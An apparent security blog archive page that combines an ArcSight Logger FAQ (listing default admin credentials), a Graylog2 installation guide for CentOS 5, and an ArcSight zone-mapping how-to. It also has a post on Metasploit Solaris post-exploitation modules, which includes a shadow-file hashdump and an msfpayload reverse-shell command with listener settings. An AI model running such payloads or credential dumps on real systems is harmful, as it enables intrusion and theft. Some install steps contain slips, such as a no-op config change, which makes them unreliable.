I receive questions about ArcSight Logger and SmartConnectors, you will find here under some answers. I will add more questions and answers in future. Don’t hesitate to add your questions as comments on this blog post.
Is ArcSight Logger L750MB still free for download ?
ArcSight Logger L750MB is now for free, since 17 August. You don’t have to pay 49$ per year any more.
Is ArcSight Logger L750MB available as ISO or virtual appliance ?
ArcSight Logger L750MB is not provided as ISO or as virtual appliance (VMWare image, Xen, VirtualBox, KVM, etc.). The Logger is available as a binary file how will install the software on an existing operating system.
Where can I find an ArcSight Logger demo ?
ArcSight has publish a Logger demonstration video on YouTube.
Where can I find an ArcSight SmartConnector list ?
Where can I download CEF (Common Event Format) specifications ?
ArcSight doesn’t provide direct access to the CEF open log management standard. You have to contact ArcSight through this Web page.
What are Logger and SmartConnector default ports ?
For ArcSight Logger it is depending if you have acquire a software or appliance version. If you have a software version, the default port will be 9000/TCP to access to the Logger Web interface and to configure the destination port of your SmartConnector. If you have an appliance version, the default port will be 443/TCP to to the Logger Web interface and to configure the destination port of your SmartConnector.
For ArcSight ESM, all communication are done on port 8443/TCP by default.
What is ArcSight Logger administration default URL ?
Default administration URL is https://$LOGGER:9000 for a software version, or https://$LOGGER:443 for an appliance version. Replace the $LOGGER variable with the hostname or IP address of your Logger.
What are ArcSight Logger default login and password ?
ArcSight Logger default login and password are “admin” / “password”
How many Storage Groups are available in ArcSight Logger ?
ArcSight Logger propose 6 Storage Groups, one of them is reserved for internal activities and one will be created by default. You have to create the 4 others Storage Groups during the Logger setup, after the installation you will no more able to create additional Storage Groups.
Do an ArcSight SmartConnector require a server ?
Depending on your architecture, you will require or not a server to host an ArcSight SmartConnector.
Cases you don’t need a server to host a SmartConnector :
- You have a L3x00 serie Logger. These Logger series have an embedded SmartConnector appliance, so you will be able to manage embedded SmartConnectors and a certain number of remote SmartConnectors directly from the Logger.
- You have a SmartConnector appliance. SmartConnector appliances are able to manage a certain number of embedded SmartConnectors, so you will be able to manage embedded SmartConnectors and a certain number of remote SmartConnectors directly from the Logger.
- You have a software Logger (L750MB or L5GB). Software Logger doesn’t provide any embedded SmartConnector appliance, you will not be able to manage remote SmartConnectors through the Logger.
- You have a L7x00 serie Logger. These Logger series doesn’t provide any embedded SmartConnector appliance, you will not be able to manage remote SmartConnectors through the Logger.
- You have ArcSight ESM. ESM don’t provide any embedded SmartConnectors, but you will able to manage remote SmartConnectors.
In this post we will do a presentation of Graylog2 features, components and installation details on Centos 5.
Graylog2 features and components presentation
Graylog2 is a free and open source log management solution that provide you a centralized repository and access to all your infrastructures logs. All the logs are stored in MongoDB, a scalable and high-performance database.
Graylog2 is composed of a server written in Java that will accept Syslog messages via TCP, UDP or AMQP (Advanced Message Queuing Protocol). AMPQ is an open standard for Messaging Middleware that allow different platforms in different languages to send messages to one another. Graylog2 is also using Drools Expert to evaluate all incoming messages against user defined rule file.
Graylog2 Web interface will allow you to search through the logs, filter them, blacklist out certain messages and create “streams“. An unlimited number of user can access the Web interface how will be able only to read defined and subscribed “streams“. Graylog2 Web interface also provide a way to use Nagios to check of the number of new log messages exceeds a given maximum.
Graylog2 “streams” are saved searches that permit you to quickly access to an overview of specifics occurrences. You can forward your “streams” to other endpoints through UDP Syslog, GELF or to Loggly, a cloud log management solution. GELF (Graylog Extended Log Format) will allow you to by pass Syslog limitations (message length, structure, timeouts, connection troubles) for your applications and servers. ”Streams” will also allow you to send alarms when the number of new message reaching a given maximum during a given period. All users who subscribed to the “stream alarms” or to the “stream” will get an email alarm.
Graylog2 Centos 5 installation
In order to have a complete and functional Graylog2 log management solution we have to install three main components, MongoDB, graylog2-server and graylog2-web-interface.
MongoDB database installation
MongoDB propose to Centos and Fedora users yum-installable RPM packages for x86 and x86_64 platforms. “mongo-10gen” (mongodb client) and “mongo-10gen-server” (mongodb server) are available through the 10gen MongoDB repository. Just follow the “Centos and Fedora Packages” documentation to allow you server to install these packages. Then simply execute the following command to install MongoDB server and client.
$ sudo yum install mongo-10gen-server
MongoDB configuration file is located in “/etc/mongod.conf” and the associated sysconfig file is in “/etc/sysconfig/mongod“. When started MongoDB will run under mongod user and group.
First edit the MongoDB configuration file and change “nohttpinterface = false” to “nohttpinterface = false“. Then start MongoDB server with the following command.
$ sudo /etc/init.d/mongod start
Now we will create a user and password to allow Graylog2 to connect to MongoDB server. The database will directly be created during the user creation, and the database will be stored in “/var/lib/mongo“. To connect you to MongoDB server you have only to run the “mongo” client.
$ sudo mongo
> use graylog2
> db.addUser(“login”, “password”)
We have now a user (login) created, with his associated password, for database graylog2. If we wish to perform further operations we need to execute the following command.
> db.auth(“login”, “password”)
We can view existing users for the database with the following command.
For further security and authentication configurations please follow the MongoDB documentation.
We need now to configure the MongoDB server default listener port (27017/TCP). Just uncomment “port = 27017” line in the MongoDB configuration file. MongoDB will listen on the loopback (127.0.0.1). Also we need to turn on security for authentication by uncommenting the “auth = true” line.
Now restart MongoDB with the following command.
$ sudo /etc/init.d/mongod restart
Graylog2 server installation
Graylog2 server require to install openjdk.
$ sudo yum install openjdk
Download Graylog2 server from Github and adapt the following commands to your need.
$ sudo cp graylog2-server-0.9.5p1.tar.gz /opt/
$ sudo cd /opt$ sudo tar -zxvf graylog2-server-0.9.5p1.tar.gz
$ sudo ln -s graylog2-server-0.9.5p1 graylog2
$ sudo cd graylog2
We need to have the graylog2 server configuration file in “/etc/” folder.
$ sudo cp graylog2.conf.example /etc/graylog2.conf
In “/etc/graylog2.conf” configuration file change all “mongodb*” settings with your MongoDB configuration. For example :
# MongoDB Configuration
mongodb_useauth = true
mongodb_user = login
mongodb_password = password
mongodb_host = localhost
#mongodb_replica_set = localhost:27017,localhost:27018,localhost:27019
mongodb_database = graylog2
mongodb_port = 27017
Also configure, in the same configuration file, the Syslog server listener port and protocol. By default the Syslog server is listening on 514/UDP.
Now start Graylog2 server with the following command.
$ sudo cd /opt/graylog2/bin/
$ sudo ./graylog2ctl start
To stop graylog2 server execute the following command.
$ sudo ./graylog2ctl stop
Graylog2 Web interface installation
Graylog2 Web interface is running under Ruby, so we first need to install the latest version of Ruby. Please remove all your previous Ruby installation cause Centos 5 only support an old release of Ruby how is not compatible with Graylog2 and other dependencies.
$ sudo yum erase ruby ruby-libs ruby-mode ruby-rdoc ruby-irb ruby-ri ruby-docs
Make sure you have all the required development tools :
$ sudo yum install openssl-devel zlib-devel gcc gcc-c++ make autoconf readline-devel curl-devel expat-devel gettext-devel
Download the latest Ruby sources and proceed with installing :
$ ./configure –enable-shared –enable-pthread –prefix=/usr
$ sudo make install
Ruby 1.9.2 and above now includes RubyGems so there’s no need to install it separately.
Test that everything installed successfully :
Update all the gems, install git and rake
$ sudo gem update && gem install git rake
Now download Graylog2 Web interface from Github and adapt to your needs the following commands.
$ sudo cp graylog2-web-interface-0.9.5p2.tar.gz /opt/
$ sudo cd /opt
$ sudo tar -zxvf graylog2-web-interface-0.9.5p2.tar.gz
$ sudo ln -s graylog2-web-interface-0.9.5p2 graylog2-web-interface
$ sudo cd graylog2-web-interface
We have also to install bundler with the following commands.
$ sudo gem install bundler
$ sudo bundle install
Edit all “*.yml” configuration files in “/opt/graylog2-web-interface/config/” folder.
“email.yml” configuration file will contain all required email configurations for alarms.
“general.yml” configuration file will contain all Graylog2 server general configurations such as hostname, automatic Graylog2 version check, etc.
“mongoid.yml” configuration file will contain all MongoDB configurations. For example :
We will server Graylog2 Web interface through Apache and Passenger.
To install Passanger just run the following command :
$ sudo gem install passenger
$ sudo passenger-install-apache2-module
$ sudo chown -R apache:apache /opt/graylog2-web-interface-0.9.5p2
$ sudo chown -R apache:apache /opt/graylog2-web-interface
Create a “passenger.conf” file in “/etc/httpd/conf.d/” directory and add the following entries :
LoadModule passenger_module /usr/lib/ruby/gems/1.9.1/gems/passenger-3.0.7/ext/apache2/mod_passenger.so
The in your “httpd.conf” file include the “passenger.conf” file.
Add a Virtual Host in your “httpd.conf“, for example :
Allow from all
CustomLog /var/log/httpd/xxx.xxx.com_access.log combined
Also include the “passenger.conf” in the “httpd.conf” file and restart apache :
Now you will be able to connect you on your vhost, configure the Graylog2 first user and connect into the Web interface.
A new set of post exploitation scripts have been developed and integrated in the Metasploit framework repository. These scripts permit you to gather interesting information’s on a Solaris target. These Metasploit post exploitation scripts are supporting all Solaris versions. For the moment are only working with a “shell” session but Metasploit team is working on a version how is supporting a complete integration with meterpreter.
Solaris enum_packages post exploitation script
This module will focus on installed softwares. Execution of “/usr/bin/pkginfo -l” and export off all results in “$HOME/.msf3/loot/” folder.
Solaris enum_services post exploitation script
This module will focus on installed services. Execution of “/usr/bin/svcs -a“ and export off all results in “$HOME/.msf3/loot/” folder.
Solaris hashdump post exploitation script
This module will gather “/etc/password” and “/etc/shadow” files and export off all results in “$HOME/.msf3/loot/” folder.
Solaris checkvm post exploitation script
This module will attempt to determine wether the targeted system is running inside of a virtual environment and will provide you the type of virtualization technology how is used. This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM.
To test these scripts you only need to create an executable payload for Solaris and follow these steps.
First create the payload with msfpayload and upload it to the targeted Solaris.
sudo msfpayload cmd/unix/reverse_perl LHOST=192.168.178.21 LPORT=4444 X > payload
Then in msfconsole, run the following commands.
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
After on the targeted Solaris, execute the payload script.
Once you have install and configure your SYSLOG ArcSight SmartConnector to communicate with your free L750MB Logger, you can customize “zones mapping” for all devices how will communicate with the SmartConnector. In CEF (Common Event Format) standard, the device zone is classified under “deviceZoneURI” and the SmartConnector zone is classified under “agentZoneURI“.
A zone represent a part of your network with contiguous IP addresses, for example LAN, DMZ, VPN, WIFI. If you customize your devices “zones mapping“, you will able to create, with your Logger, alerts, queries and reports for group of devices how are in the same zone. This will save you time
An ArcSight SmartConnector zone is represented by :
- A starting IP address (for example : 192.168.0.15)
- A ending IP address (for example : 192.168.0.20)
- A zone name (for example : /All Zones/Office Zones/Printers)
The zone will be represented by this uncommented line :
192.168.0.15,192.168.0.20,/All Zones/Office Zones/Printers
In order to customize your devices “zones mapping“, you only have edit the “defaultzones.csv” file located in “$ARCSIGHT_HOME/current/user/agent/acp/” directory.
Delete the following line from the file :
#ignore.this.file <- delete this line
Then add your zones mapping, save the file and restart the SmartConnector.